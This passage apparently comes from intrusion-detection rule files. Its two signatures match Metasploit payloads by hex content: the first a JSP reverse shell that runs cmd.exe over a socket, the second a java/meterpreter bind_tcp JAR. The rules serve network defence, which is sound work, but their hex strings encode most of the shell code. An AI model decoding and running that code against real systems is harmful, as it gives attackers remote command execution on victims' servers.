25 40 70 61 67 65 20 69 6d 70 6f 72 74 3d 22 6a 61 76 61 2e 6c 61 6e 67 2e 2a 22 25 3e 0a 09 09 09 3c 25 40 70 61 67 65 20 69 6d 70 6f 72 74 3d 22 6a 61 76 61 2e 75 74 69 6c 2e 2a 22 25 3e 0a 09 09 09 3c 25 40 70 61 67 65 20 69 6d 70 6f 72 74 3d 22 6a 61 76 61 2e 69 6f 2e 2a 22 25 3e 0a 09 09 09 3c 25 40 70 61 67 65 20 69 6d 70 6f 72 74 3d 22 6a 61 76 61 2e 6e 65 74 2e 2a 22 25 3e 0a 0a 09 09 09 3c 25 0a 09 09 09 09 63 6c 61 73 73 20 53 74 72 65 61 6d 43 6f 6e 6e 65 63 74 6f 72 20 65 78 74 65 6e 64 73 20 54 68 72 65 61 64 0a 09 09 09 09 7b 0a 09 09 09 09 09 49 6e 70 75 74 53 74 72 65 61 6d 20 69 73 3b 0a 09 09 09 09 09 4f 75 74 70 75 74 53 74 72 65 61 6d 20 6f 73 3b 0a 0a 09 09 09 09 09 53 74 72 65 61 6d 43 6f 6e 6e 65 63 74 6f 72 28 20 49 6e 70 75 74 53 74 72 65 61 6d 20 69 73 2c 20 4f 75 74 70 75 74 53 74 72 65 61 6d 20 6f 73 20 29 0a 09 09 09 09 09 7b 0a 09 09 09 09 09 09 74 68 69 73 2e 69 73 20 3d 20 69 73 3b 0a 09 09 09 09 09 09 74 68 69 73 2e 6f 73 20 3d 20 6f 73 |"; content:"| 3b 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 70 75 62 6c 69 63 20 76 6f 69 64 20 72 75 6e 28 29 0a 09 09 09 09 09 7b 0a 09 09 09 09 09 09 42 75 66 66 65 72 65 64 52 65 61 64 65 72 20 69 6e 20 20 3d 20 6e 75 6c 6c 3b 0a 09 09 09 09 09 09 42 75 66 66 65 72 65 64 57 72 69 74 65 72 20 6f 75 74 20 3d 20 6e 75 6c 6c 3b 0a 09 09 09 09 09 09 74 72 79 0a 09 09 09 09 09 09 7b 0a 09 09 09 09 09 09 09 69 6e 20 20 3d 20 6e 65 77 20 42 75 66 66 65 72 65 64 52 65 61 64 65 72 28 20 6e 65 77 20 49 6e 70 75 74 53 74 72 65 61 6d 52 65 61 64 65 72 28 20 74 68 69 73 2e 69 73 20 29 20 29 3b 0a 09 09 09 09 09 09 09 6f 75 74 20 3d 20 6e 65 77 20 42 75 66 66 65 72 65 64 57 72 69 74 65 72 28 20 6e 65 77 20 4f 75 74 70 75 74 53 74 72 65 61 6d 57 72 69 74 65 72 28 20 74 68 69 73 2e 6f 73 20 29 20 29 3b 0a 09 09 09 09 09 09 09 63 68 61 72 20 62 75 66 66 65 72 5b 5d 20 3d 20 6e 65 77 20 63 68 61 72 5b 38 31 39 32 5d 3b 0a 09 09 09 09 09 09 09 69 6e 74 20 6c 65 6e 67 74 68 3b 0a 09 09 09 09 09 09 09 77 68 69 6c 65 |"; content:"| 20 28 20 6c 65 6e 67 74 68 20 3d 20 69 6e 2e 72 65 61 64 28 20 62 75 66 66 65 72 2c 20 30 2c 20 62 75 66 66 65 72 2e 6c 65 6e 67 74 68 20 29 20 29 20 3e 20 30 20 29 0a 09 09 09 09 09 09 09 7b 0a 09 09 09 09 09 09 09 09 6f 75 74 2e 77 72 69 74 65 28 20 62 75 66 66 65 72 2c 20 30 2c 20 6c 65 6e 67 74 68 20 29 3b 0a 09 09 09 09 09 09 09 09 6f 75 74 2e 66 6c 75 73 68 28 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 28 20 45 78 63 65 70 74 69 6f 6e 20 65 20 29 7b 7d 0a 09 09 09 09 09 09 74 72 79 0a 09 09 09 09 09 09 7b 0a 09 09 09 09 09 09 09 69 66 28 20 69 6e 20 21 3d 20 6e 75 6c 6c 20 29 0a 09 09 09 09 09 09 09 09 69 6e 2e 63 6c 6f 73 65 28 29 3b 0a 09 09 09 09 09 09 09 69 66 28 20 6f 75 74 20 21 3d 20 6e 75 6c 6c 20 29 0a 09 09 09 09 09 09 09 09 6f 75 74 2e 63 6c 6f 73 65 28 29 3b 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 28 20 45 78 63 65 70 74 69 6f 6e 20 65 20 29 7b 7d 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 0a 0a 09 09 09 09 74 72 79 0a 09 09 09 09 7b |"; content:"| 09 09 09 09 09 53 6f 63 6b 65 74 20 73 6f 63 6b 65 74 20 3d 20 6e 65 77 20 53 6f 63 6b 65 74 28 20 22 |"; content:"| 20 29 3b 0a 09 09 09 09 09 50 72 6f 63 65 73 73 20 70 72 6f 63 65 73 73 20 3d 20 52 75 6e 74 69 6d 65 2e 67 65 74 52 75 6e 74 69 6d 65 28 29 2e 65 78 65 63 28 20 22 63 6d 64 2e 65 78 65 22 20 29 3b 0a 09 09 09 09 09 28 20 6e 65 77 20 53 74 72 65 61 6d 43 6f 6e 6e 65 63 74 6f 72 28 20 70 72 6f 63 65 73 73 2e 67 65 74 49 6e 70 75 74 53 74 72 65 61 6d 28 29 2c 20 73 6f 63 6b 65 74 2e 67 65 74 4f 75 74 70 75 74 53 74 72 65 61 6d 28 29 20 29 20 29 2e 73 74 61 72 74 28 29 3b 0a 09 09 09 09 09 28 20 6e 65 77 20 53 74 72 65 61 6d 43 6f 6e 6e 65 63 74 6f 72 28 20 73 6f 63 6b 65 74 2e 67 65 74 49 6e 70 75 74 53 74 72 65 61 6d 28 29 2c 20 70 72 6f 63 65 73 73 2e 67 65 74 4f 75 74 70 75 74 53 74 72 65 61 6d 28 29 20 29 20 29 2e 73 74 61 72 74 28 29 3b 0a 09 09 09 09 7d 20 63 61 74 63 68 28 20 45 78 63 65 70 74 69 6f 6e 20 65 20 29 20 7b 7d 0a 09 09 09 25 3e 0a 09 |"; sid:1000036; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"java/meterpreter/bind_tcp"; flow:established; content:"| 50 4b 03 04 14 00 00 00 00 00 f3 6c b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 4b 03 04 14 00 00 00 08 00 f3 6c b9 3e f2 a1 d4 1c a7 10 00 00 f1 1f 00 00 18 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 61 79 6c 6f 61 64 2e 63 6c 61 73 73 95 58 0b 7c 53 e5 15 3f 27 b9 c9 bd b9 bd 6d 43 4a 80 4b 45 51 2b 86 be a2 0c aa 06 64 96 52 a4 d0 97 a4 50 03 3a b8 24 b7 34 92 e6 96 e4 16 8a db 9c db 50 e7 74 d3 bd 54 7c cb d8 ea dc d8 a0 6c 69 b5 82 7b 68 51 37 9d 9b 1b f8 da 53 f6 70 ee ed 74 4f 65 e7 dc 9b b4 69 1b 1c eb ef d7 ef bb df eb 3c ff e7 7c e7 cb d3 ef 3c 72 18 9c 50 e3 98 29 c3 4a f8 99 08 3f 17 e1 17 32 dc 04 bf 94 69 fa 55 19 86 e1 b8 08 bf 92 41 84 e3 1e e8 86 5f 4b f0 1b 99 fa df 8a f0 9a 0c 0a 1c e7 63 bf 93 e1 02 78 9d 87 bf 97 e0 0f dc ff 51 82 3f f1 ca 9f f9 e0 5f 64 f8 2b bc 21 c1 df 78 f0 a6 04 6f 49 f0 77 19 e6 c0 3f b8 f9 a7 08 ff e2 fe df 12 fc 87 fb 57 b9 79 9b 9b 77 98 cf 09 19 01 51 42 07 cd a0 93 07 82 84 2e 09 dd 44 0b |"; content:"| 45 99 56 3c c4 1c 65 1e 16 49 a8 f0 b6 62 6e 4a 44 2c 95 e1 7c f4 4a 38 8d 17 7d 34 80 37 64 2c c3 e9 22 fa 25 9c 41 d4 71 a6 84 b3 78 4a 95 71 36 96 73 73 9a 0b ac 3f f1 39 19 e7 e0 e9 4c e9 8c ec 14 c4 c8 00 38 97 9b 33 25 3c 4b c2 b3 45 ac f0 e0 39 38 8f 34 c5 73 45 0c f0 60 be 8c 95 58 25 62 b5 84 35 12 d6 32 cd a0 88 e7 91 49 f1 7c 09 17 48 f8 1e 09 17 7a 70 11 d6 71 73 81 88 17 ca 10 c1 8b 44 0c c9 b0 01 17 73 b3 84 1a 12 95 a6 cb b9 b9 58 c4 a5 12 be 57 c2 4b 24 ac 97 41 c3 65 dc 34 70 b3 5c c4 46 b6 d2 71 09 57 b0 3e 97 4a b8 92 8c 8d 4d ac f9 2a 11 57 cb 60 60 b3 88 2d 32 6c 23 3f 62 ab 0c 69 76 d9 36 6c 13 b1 5d c4 cb 44 5c 23 61 58 86 7e 78 55 c4 0e 19 76 e0 5a 19 b6 e3 3a 3e d7 c9 cd e5 84 00 8c 70 b3 5e c2 0d ac e8 15 12 5e c9 36 78 9f 84 1b b9 df 24 a1 c6 fd 66 09 a3 22 c6 44 d4 65 b8 19 bb 58 e1 2d 3c df cd 4d 5c c2 ab 58 c0 ad 12 26 b8 ef 91 30 c9 bd c1 06 ee 15 71 9b 0c 77 b0 60 dd 98 a2 2f 4c 7b 68 da 64 0d fb 24 dc ce 0e de 21 61 bf 8c 3b f1 6a 5e 7e 3f 2f 7f 80 70 |"; content:"| 1f e4 b9 6b f8 eb 43 bc eb 5a 6e 3e cc cd 47 b8 f9 28 37 bb b8 b9 8e 9b eb 25 bc 41 c6 45 f0 a6 07 3f 86 37 f2 cc c7 59 b6 9b 24 bc 99 fb 4f 48 f8 49 09 6f 91 f0 56 11 3f 85 20 b6 85 37 b6 d6 b7 34 22 f8 9a af d2 b6 6b c1 84 96 dc 12 0c 9b a9 78 72 cb 62 04 a9 bd be 63 e5 c6 70 63 3b 82 bb 29 bc b1 be e9 72 c2 e6 7a 7b b0 bc 2d 8c e0 59 55 bf ae 7e e3 ca 36 a6 30 2b 9a d0 d2 e9 8a 1e dd d4 d2 bd 09 23 6e 56 b4 6b 3b 13 86 16 43 98 96 47 bc 81 77 11 6d 4f 78 67 d2 ec d6 cd 78 94 98 db 47 79 53 45 dc a8 58 11 4f e8 08 73 26 4e 2e d7 4c ad 29 d9 db 67 92 74 ba d6 83 30 7b e2 7a 5b 9f 99 b7 38 53 4b a5 b4 9d 15 16 df 0a e6 5b 61 2b 45 b2 2f 89 27 e3 e6 52 04 67 60 fe 3a 04 a1 c1 88 11 33 a1 47 8b 27 11 66 04 36 4c b5 03 6f 93 1b fb a3 7a af 19 37 92 69 52 67 47 2a 6e ea 8d 3d 9b f5 58 4c 8f d9 d2 2e 0c 4c d1 71 2a 25 7b 26 6e 04 f9 0c d1 15 f1 d3 22 7e 86 6c b1 d9 30 cc b4 99 d2 7a 11 c2 81 b1 5d 79 ea 8e 1f cd d7 b3 00 8b 93 c8 ef dd a2 9b ab 52 7a 63 bf 1e ed 33 b5 cd 2c f1 bc 40 81 |"; content:"| 85 50 a0 68 b1 58 63 bf a9 27 d3 a4 3e 09 db 15 4f c6 9a 92 cb e3 a9 49 5a 4f 50 b2 00 d5 9c de 44 22 69 a4 7a b4 44 fc 6a 12 e3 ac c0 29 1c 10 63 f1 74 5a 8f 9a 08 e7 16 da be a1 90 d8 6e 1b 1f 08 e7 fc 0f 45 73 88 94 96 44 13 16 36 14 fc 2c fc 04 61 ee a4 2d ad 86 b9 c2 e8 4b c6 c6 a0 80 70 fa f8 96 56 c3 da b4 5c ef b2 37 a5 52 46 4a c1 cf e1 6d 0a 1c c1 db a9 81 27 11 a6 5b fb fb cc 78 22 d8 9e 32 7a f5 94 19 d7 d3 0a 7c 13 be 45 41 30 1e 39 b5 d9 c8 51 e0 15 16 64 c6 64 f1 97 f5 75 75 e9 44 fd 0e a2 8e bb f1 4e 05 ef c2 bb 49 e3 5a 4b 65 05 ef c1 db 10 4a 83 79 04 63 9a a9 e0 bd 78 9f 82 f7 e3 03 22 ee 51 f0 f3 2c 8f 3c 0e 08 05 f7 c2 8f 88 c6 35 e9 5e 6d 07 a9 26 d4 9a 3d bd 0a 7e 01 8e 29 f8 45 1c 20 18 e4 fb 44 c1 07 99 87 50 1b 8b 93 1c 5f c2 01 d6 f2 21 05 9e 81 67 45 fc b2 82 5f c1 7d 14 27 cb 49 c7 5e 3d 96 cf e4 ab 2c f2 d7 70 3f 82 2b 6c 33 c2 f3 88 35 1e 10 71 50 c1 83 f8 75 05 bf 81 19 05 87 70 18 a1 64 b2 06 0f e3 23 0a 8e b0 34 b3 f2 a5 c9 8f 09 16 e4 51 04 ca |"; content:"| f0 b0 88 8f 29 f8 4d 24 eb 7a 27 db 90 84 e7 29 05 9e 67 b5 e5 1a cb 74 bd 9a d9 ad e0 b7 f1 3b 22 3e ae e0 13 38 aa e0 11 1c 15 f1 49 05 9f c2 a7 15 fc 2e 3c a9 c0 61 38 a4 c0 77 d8 65 96 49 6a e3 46 ad 9d 03 8a d3 ba 99 1f 61 a5 93 00 24 e2 f7 14 7c 06 be a5 e0 b3 f8 fd 09 22 b5 6d be 8a d0 ad e0 73 f8 03 11 7f a8 e0 f3 48 32 9d 91 0f ae 70 5f b4 bb 45 37 bb 8d 7c f8 b9 a2 dd 3d 06 e5 57 47 55 bf 82 3f c6 a3 08 65 e3 67 c6 f6 29 78 8c 7d ed 6a 6e 6f 5b d3 41 6a 2f a4 3f 1e ae 6c 0b 77 88 f8 82 82 2f e2 4b 0a be 8c af e4 24 4e ea 66 30 6c 44 b7 ea 26 1b 93 00 e8 1f 9f d6 53 db f5 d4 f8 e2 4f 15 fc 19 fe 5c c1 5f e0 2f 11 d4 71 74 db 36 ee 30 b6 ea 49 8a 72 ca 14 45 59 48 cf ad a9 99 4b 7c c2 a6 b6 45 6f d7 52 1a 79 58 4f 51 4e c5 b9 4c ee 55 05 8f e3 51 05 7f c5 e0 ca 0b 88 e0 d8 55 52 9c 4b bb 16 05 05 7e 00 3f a4 c3 41 05 7f 8d bf 51 f0 b7 f8 1a e5 fe 1c 34 26 5d 19 cc e0 81 9c 94 94 4d fa 28 8b ef 0c b6 eb a9 1e 4a 2e 76 66 2f 9f b8 56 9f 48 8c 2f 2b f8 3b 7c 3d 17 f2 e3 c7 |"; content:"| ae a3 f5 e5 86 7d 87 cc 9a b8 81 ef 97 b0 d1 97 8a ea b9 10 62 3b ae 5d d3 4c 09 a7 8b 60 13 0a 06 83 53 a8 46 29 33 04 1b 38 3d 74 c5 a3 9a a9 b3 e8 bf e7 e6 0f 0a fe 91 0d f4 27 fc b3 82 7f c1 bf 2a f8 06 fe 8d 4c c5 c7 7b 6d 1b d5 a6 d9 32 b5 0a be 89 6f 91 9b 69 94 22 57 3d ce 78 9d 99 c3 eb 14 cb 3c c1 cb d3 73 cb 13 e3 69 94 d7 ca ec 1c 5b cb d0 aa 1d cb b1 79 70 eb e8 4e 19 3b 6c dc 97 e5 1c d0 4e db f2 8c ff 77 42 22 fe 43 81 47 39 80 1e 83 47 e8 0e 0e a6 bb 15 38 0a c7 08 96 c1 cd f1 a4 02 3f e6 68 14 6a f5 7e d2 f9 05 78 51 c1 7f 72 b4 97 e6 23 4b 8b 6e 55 e0 25 78 59 c1 7f e1 3e 05 ff 0d 94 13 fe c3 bb 90 94 7e 1b df a1 78 a8 ad 15 f1 84 e2 00 32 95 03 f1 2d c5 e1 70 38 29 49 3a 04 c5 e1 72 b8 f9 4b 54 1c 92 c3 a3 38 64 47 91 e2 50 1c c5 8a a3 84 37 97 3a bc bc 30 8d 16 30 43 f7 8e 91 ae 4d 12 46 45 87 4f 71 94 39 a6 2b 0e bf 63 86 02 0f b3 ec 25 9c 2c 6a d3 7a 2f a1 d8 a4 5c 0f 23 96 46 5a bc 9f 24 e1 4b ce b2 57 b7 d1 a3 e7 02 68 3c 13 34 93 9f 38 2a e6 e4 67 b1 |"; content:"| 98 25 9b da f2 66 c5 2e 23 d5 aa 31 5d 99 ae f5 16 3d 9d 26 87 93 fb 02 05 af 6f 7f a0 70 49 20 d2 59 9b 8a 98 d2 7b 13 1a 03 74 46 a0 a1 a1 20 11 b7 46 89 3c 49 f1 57 7d 4a 55 83 7d 41 f1 9d 6a 1a b9 74 5b 46 fc d6 e8 69 2b 14 ea d3 b9 42 6d fe bb 5e ff f9 15 10 c1 c2 4e 01 b3 0a 57 48 ac 53 59 81 05 4e 93 09 23 4d da 15 91 04 d9 6b 77 27 f9 2f 4a ab a6 de a1 f7 f4 da e9 db 1d d3 13 94 8d ac ca 90 8a dc 52 da 5d bf 39 6d 24 fa 4c ca 54 66 37 d1 e9 d9 1a e3 aa e7 ec c0 c4 fa a4 b0 7d cb c6 31 bb 52 4b 77 67 ef 04 77 4a ef 31 b6 4f 2e bf ec fc 3f c1 90 d9 29 bb 74 6b d0 92 46 92 32 41 c2 16 c4 49 ca 21 5c 58 80 c2 29 d2 bc f0 ff a9 db 26 22 61 da f8 5c 53 d2 d4 b7 30 8c 25 8a 81 b4 4e c3 93 a0 ad 89 30 b6 5d 4b f4 e9 6d 5d bc a3 a9 20 e1 a2 74 be 77 fe 7f 09 c7 94 2b 66 37 6b 29 3d 69 da 7e f5 06 a6 d4 93 6e cb 93 5c ca 07 26 d7 e4 56 ca 34 52 74 ae 2a 70 aa 45 37 9f ca b3 cb 9a be a4 19 cf 85 e7 d8 c0 3f 21 3c b3 d3 8c 6a ca 75 f4 06 0a 14 7c 7a e4 4d 91 6d a2 ba 55 a8 4e |"; content:"| 26 56 13 40 3f 33 70 b2 30 e2 ad 56 79 9a db ea 9d 90 c5 75 8e 31 57 3a a1 eb f4 1a 11 02 ab 58 39 c5 0e 8d b6 64 63 7f dc 9c 20 c0 32 c3 48 e8 1a d7 8b 1d 91 76 7a 05 7a ac 8c c4 75 0a c2 25 81 77 7f 9f d8 85 77 be 8e 29 bd 2b 41 4e 0c da 14 d8 38 1d 6b d6 12 d5 b2 e6 29 1c 17 e7 6e da 02 07 c9 c1 f1 e4 76 2a 3e 10 2e 2a 10 24 1b 4e 31 4a c4 1d 5a 9c 52 72 ca ca 08 84 e1 d2 5e fb 3e a3 0b a8 23 65 e5 cb fc aa 72 67 da d4 c9 98 0e ae 01 fc 27 31 bd d3 e0 c0 1d 5f cd bb 20 17 73 f6 9d 6a af 26 eb 91 1a b0 3a b7 16 e5 3b 80 cc 91 f3 ed 78 a5 b6 d8 4e 58 13 5f c1 b3 f2 30 30 01 c2 85 df 51 85 81 5d 14 a5 4b c9 b4 4a b9 34 3f dd f4 7e 7b 40 62 65 b1 12 d8 b0 8c cd e3 b2 9e c5 64 36 1a 37 59 02 3b e9 e5 48 97 5c 96 55 81 92 cb 62 b0 20 d0 9c 5f 17 e5 dc 73 d2 62 c8 3a 54 3f 99 e8 78 9d b5 f8 a4 ec 1a 8c 44 c2 2e d6 ec 1b 90 e5 b7 b2 96 87 bf 56 f4 25 12 3b b3 ea b0 de 31 9d 5e ba ba 05 52 84 a6 42 58 26 35 9b df bd 1c 2c f8 d0 54 52 74 0d 26 b6 e7 48 4f 9f fa d3 81 c5 3f a9 ef |"; content:"| 68 4a 52 f9 |"; content:"| 8c 4e b9 dc c7 20 aa 9e 24 47 31 81 bc 7b 32 1f 67 16 92 f4 fe 78 da 24 de 42 6f 5f 9a 2e 14 cf 58 19 43 e9 b3 5b 4b b7 50 02 cc 79 dc ad 6f eb d3 12 e9 49 a9 3d 17 37 eb 73 41 60 5d 74 eb 68 8e 69 08 69 eb 6d ef ec 35 7a ad 67 51 96 78 43 b7 46 8b d8 40 85 76 a0 e1 5d aa 06 0f 65 9b 1e ca df f5 e6 94 eb 62 4c f3 ea ff 71 7f 4e 22 29 c6 93 31 bd 9f ef 1f 0e a6 26 56 b9 6f 73 3a 5b 9a cc 08 34 9d e4 4e 32 0d 96 b9 9e 7f 4c e2 93 f3 37 90 ec ee 84 9e dc c2 d7 b0 3b ca 6b a6 4d b2 81 91 d3 64 91 ce 33 48 b3 41 97 36 c7 44 63 eb a5 cd 4d e1 95 63 3f b4 e5 ad da 7c 9a 8d 1d 7a aa 41 4b e7 95 06 f9 7b 0a 88 07 67 42 37 0c 03 80 0c b3 b9 24 a5 af d9 5c 84 5a 3d d5 d8 56 7f 38 db 3f 66 cd 4b fc 53 03 20 7c db fa ad 57 e2 57 6c de e8 f1 09 a3 27 26 8c 46 f3 46 45 f4 75 04 9e a4 f6 29 1a 4d a3 9e de db e0 aa 1c 02 f7 01 6b 83 07 9e 86 ef 82 83 97 9d 06 b8 69 0b 38 c3 23 20 46 86 40 6a 1e 04 cf 11 28 f5 c9 c3 50 14 39 08 9e 01 70 d3 4c cb 08 28 b4 5a 5c 9d 81 12 6f ad 37 98 81 d2 |"; content:"| 0c 78 7d d3 a8 |"; content:"| c9 80 af b5 da 57 96 81 e9 21 41 15 46 a1 a4 4a 15 32 e0 e7 66 46 95 6f 66 06 66 85 5c aa 6b 14 36 f9 54 df ec 61 28 0f b9 55 77 06 4e eb 1c 81 39 91 2c 55 9e 38 9d e9 9d 61 d3 1b 82 b9 21 51 15 33 70 a6 b5 4b 15 55 d7 10 9c 15 92 aa 55 97 2a 0d c3 d9 16 d9 8a ce 2a df 39 aa 94 81 79 19 38 97 be 03 be f9 19 a8 1c 86 aa 3a 37 2d 30 5b d1 ef be 17 4f a3 15 bf 5b 88 0d 03 c9 5e d3 99 13 42 e2 93 13 85 90 a6 0a e1 b1 d8 7b 7c b5 cc 5e b6 07 35 fc 5d a4 16 65 80 ac 70 5e 67 75 8d 5a 44 22 8d c0 f9 11 55 1e 82 05 21 a5 4a 55 7c ef c9 c0 42 55 c9 c0 a2 61 a8 13 0f c1 05 11 a7 ef c2 61 b8 28 1c 11 7c a1 70 c4 a5 7a 88 57 38 e2 66 73 86 33 b0 38 54 ac 16 67 60 09 59 8c fb 8b a9 9f 0e 4b 87 e1 12 3a 3a 27 e2 54 8b e8 9c c5 90 8f ca 74 4e f5 84 43 25 ce ba 52 7f a9 5a 72 78 0f 2c 72 d6 79 fd 5e af bc 07 ce 51 4b fc a5 0b 48 b3 dd e0 1e 80 99 d9 51 fd 74 58 46 d4 76 79 71 e0 c4 4b bb 4a a9 7d 6a 00 63 aa 38 0a 77 db f6 65 5d a5 41 58 7e 27 44 07 a1 91 dd bf c2 76 7f a3 e5 fe 46 |"; content:"| a5 c2 21 58 19 |"; content:"| 71 0e 42 13 89 bb 4a 95 68 b8 9a 87 cd 34 6c e9 1c 20 8b 78 48 53 b7 ad 69 1b ab d9 ce b2 8a ac 5c 06 2e a3 1d 72 c8 c3 5a 87 69 9b 60 6d b3 17 3b 2d ae 3e db 1b dc 06 f9 63 00 46 ab 7c 1d be b5 59 87 4a 55 be 75 48 df 21 8f 5f ba 07 bc 83 d0 19 92 07 e1 f2 50 d1 00 5c ac 7a 46 a1 6c 04 22 e4 19 bf 34 04 eb 43 ca 00 cc 1e 81 0d 11 1e 5d 61 1b f6 ca 90 c2 dd fb d8 23 1b 43 32 77 9b 42 45 23 a0 e5 7c ef db 4c 3e af f2 45 d9 6f 95 b6 fb 7d b1 21 d0 e9 1c ed ed 22 79 43 c5 ce ba 12 7f 89 5a 4c e6 2e 53 8b e9 8b 16 b6 84 77 95 90 31 5f 1f 81 6e a2 12 57 65 b5 a8 ca 77 15 4b aa 16 0f c1 d6 03 e0 70 88 8e c5 8e a5 d0 4a fd 95 8e 4d b0 86 82 ef 7b f4 2f 50 44 ae a1 bc f0 0c 3c 6b 87 21 ac a5 39 91 fa a6 ca 9c 48 09 16 c9 96 85 62 ab 95 01 56 cd f8 12 a6 79 e1 51 29 e4 aa 51 5d 19 e8 89 d4 b9 1d f7 81 57 15 54 97 d3 4f 61 94 1c 38 f1 1a 87 de 22 3b d2 99 99 9b 58 7c 1f 9e 03 1f ff 18 63 b3 c3 f9 c4 ac 88 7a ff 08 18 91 aa 21 e8 0d b9 46 60 1b f1 4d 71 e0 8d 40 9a 3e cd 0c f4 |"; content:"| 8d c0 76 b2 d1 0e |"; content:"| ef 8f f8 76 0e c1 d5 ce 43 f0 fe 21 f8 00 43 e6 83 21 a9 e6 08 5c c4 62 5c 53 e7 f1 7b 48 28 99 02 54 ce c0 87 2a 2b 51 95 9d 7e 0f 3b f4 da 48 88 e4 fa f0 d8 b6 7b 4e 1c 1b 80 f2 9c 96 1f 21 0d 6b 6c 2d 87 01 ed dc f0 51 82 8a db b7 cb 9d 85 dc 75 8c c7 eb 6d 3c 5e 67 e1 f1 3a 02 d8 20 dc c0 f3 1f b3 e7 6f b0 e6 6f 20 cc 0d c2 8d 3c ff 71 7b fe 46 6b fe 46 0b b4 1e b7 05 5a d5 45 a7 ab 19 9d 42 16 bc 3e 4e 50 23 70 33 db f7 13 19 f8 e4 01 ce 97 e8 40 17 dc 34 c9 5f cf c3 8f b2 59 75 3d 19 d2 41 7d 2b 52 c2 bc 65 37 cc c9 2a 34 08 b7 72 0e f9 94 ad 12 a1 f7 d3 cd 55 47 26 af 7e 26 7f 75 14 24 72 f3 e9 fb 69 f4 d9 fd 96 d3 64 fe 95 25 cb a7 8a b8 70 f6 3e 23 4b 81 d1 49 21 b3 1b 24 df e7 06 c0 c5 80 65 52 b9 83 47 e1 58 f6 e0 02 12 5a a0 7e 1e d1 bd ad 05 5b 29 d5 dc be 1b 54 8e f7 ea 2a 62 45 59 ac 95 0c 7f fb 9d e0 c2 d6 9a dc f9 17 e0 c5 ec f9 87 e9 b4 9b fa 7d 23 70 07 31 de dd 4c 74 ee 6c a9 aa 76 52 3e b9 ab 93 63 a7 5a 58 30 08 77 53 94 30 9d 7b 76 43 03 75 |"; content:"| 5b 42 82 ef 5e c6 df |"; content:"| 7d 9c 80 4e bc e6 bb 3f 3b 38 8d 74 7c c0 b5 07 14 16 80 6e a2 b9 fb 69 62 0f e7 05 eb ba b8 ab 73 e0 c4 a3 59 15 43 82 b3 ce e5 77 f1 81 3d 50 e1 77 09 7b 41 51 c9 df 9f cf c0 de 4e 55 a8 f2 13 92 be 90 81 2f 76 ee 72 51 f0 bd 68 65 30 c1 4e d8 39 35 5e 82 97 6d 35 d0 43 6a 48 34 f7 36 9d 5f 52 e9 0d 96 d3 cd e5 bd 82 db d5 d8 52 e9 0d 65 60 60 e9 9c 7b e1 7a cb a6 d7 ce 11 36 d5 09 95 4e 3f 91 7b b0 85 4c fd 25 0e 8b dc c5 e7 a5 53 7b 89 4f 8b ea f2 0b 0b cb ef 07 d9 2f 08 9b c8 09 7e a1 4e c8 c9 ee a6 81 e8 a7 0b 8b f2 44 80 36 8a bc b1 84 3f 84 d8 c2 f2 fb e8 d3 6d cd b2 2e bb 44 92 ff 28 23 de b7 7a 00 2e 23 7e 0f 91 ae ef ad 24 ee 5f a6 53 75 95 e5 a4 e9 57 48 a0 72 66 64 7d fa 05 d7 5e 28 65 09 79 e2 c1 01 10 2a 5b 2a 49 b6 87 32 b0 8f 68 10 c0 ee 6e e1 f3 fb 56 bb ac 24 4b 38 17 2a c3 fb b3 45 c2 2b f0 93 6c ba 99 07 4e 0b be 8c 41 dc df 3c 02 ce 08 d9 5b 18 02 d7 63 16 dc 04 70 59 eb b9 f2 e2 a7 63 e5 44 bd 35 0f b0 c8 f7 d5 61 f8 da 20 ec cf c0 81 83 |"; content:"| e8 3b 48 a3 83 f0 75 |"; content:"| df 37 06 61 90 3c 7e 10 6e 19 a4 51 c6 fa 5c ee 1b b2 56 6f b5 93 12 fc 17 50 4b 03 04 14 00 00 00 00 00 f3 6c b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 4d 45 54 41 2d 49 4e 46 2f 50 4b 03 04 14 00 00 00 08 00 f3 6c b9 3e 06 f5 c4 12 4a 00 00 00 5b 00 00 00 14 00 00 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 46 45 53 54 2e 4d 46 f3 4d cc cb 4c 4b 2d 2e d1 0d 4b 2d 2a ce cc cf b3 52 30 d4 33 e0 e5 f2 4d cc cc d3 75 ce 49 2c 2e b6 52 c8 4d 2d 49 2c 2e c8 c9 cf 2c d1 0b 48 ac cc c9 4f 4c e1 e5 e2 e5 f2 4b cc 4d 45 96 d3 87 ca e9 25 83 74 81 54 00 00 50 4b 03 04 14 00 00 00 00 00 f3 6c b9 3e |"; content:"| 10 00 00 00 10 00 00 00 0e 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2e 64 61 74 53 70 61 77 6e 3d 32 0a 4c 50 4f 52 54 3d |"; content:"| 0a 50 4b 01 02 14 00 14 00 00 00 00 00 f3 6c b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 4b 01 02 14 00 14 00 00 00 08 00 f3 6c b9 3e f2 a1 d4 1c a7 10 00 |"; content:"| 00 f1 1f 00 00 |"; content:"| 00 00 00 00 00 00 00 00 00 00 00 00 00 29 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 61 79 6c 6f 61 64 2e 63 6c 61 73 73 50 4b 01 02 14 00 14 00 00 00 00 00 f3 6c b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 06 11 00 00 4d 45 54 41 2d 49 4e 46 2f 50 4b 01 02 14 00 14 00 00 00 08 00 f3 6c b9 3e 06 f5 c4 12 4a 00 00 00 5b 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 2d 11 00 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 46 45 53 54 2e 4d 46 50 4b 01 02 14 00 14 00 00 00 00 00 f3 6c b9 3e |"; content:"| 10 00 00 00 10 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 a9 11 00 00 6d 65 74 61 73 70 6c 6f 69 74 2e 64 61 74 50 4b 05 06 00 00 00 00 05 00 05 